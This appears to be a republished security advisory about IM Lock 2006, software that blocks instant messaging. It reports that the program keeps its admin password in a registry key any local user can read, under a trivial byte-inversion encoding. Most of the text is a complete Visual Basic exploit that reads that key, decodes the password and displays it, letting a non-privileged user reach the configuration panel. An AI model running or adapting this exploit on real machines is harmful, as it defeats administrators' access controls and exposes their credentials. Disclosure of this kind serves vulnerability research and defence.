IM Lock Insecure Registry Permission (Exploit)Summary
Security Auditing & Management software, IM Lock controls and blocks access to Instant Messaging and peer to peer services that can infect computers with viruses.
An encrypted password is stored in the registry, this key is readable by non-privileged users on the system, so by decoding the password, a malicious user could gain access to the config panel.
Credit:
The information has been provided by fRoGGz.
Details
Exploit:
############################################################################
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz
' Versions: Home Edition, Enterprise & Professional
' Application: IM Lock 2006
' Distributor : Comvigo, Inc.
' Link: http://www.comvigo.com
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.
'
' Discovered & Coded by fRoGGz
' Credits to: SecuBox Labs - shadock.secubox.com
'
' ############################################################################
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _
(ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _
(ByVal hKey As Long, _
ByVal lpValueName As String, _
ByVal lpReserved As Long, _
lpType As Long, _
lpData As Any, _
lpcbData As Long) As Long
Dim i As Integer
Dim GetCrypt, Decrypt As String
Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String
Dim keyhand As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
Dim sBuffer As String
r = RegOpenKey(hKey, strPath, keyhand)
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = 1 Then
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GrabBDR = Left$(strBuf, intZeroPos - 1)
End If
End If
lResult = RegCloseKey(hKey)
End If
End Function
Private Sub Form_Load()
GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc")
If GetCrypt <> "" Then
For i = 1 To Len(GetCrypt)
Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))
Next
MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _
vbOKOnly, "Secubox Labs - Recovery"
Else
MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?"
End If
End
End Sub
推荐
评论(0条)
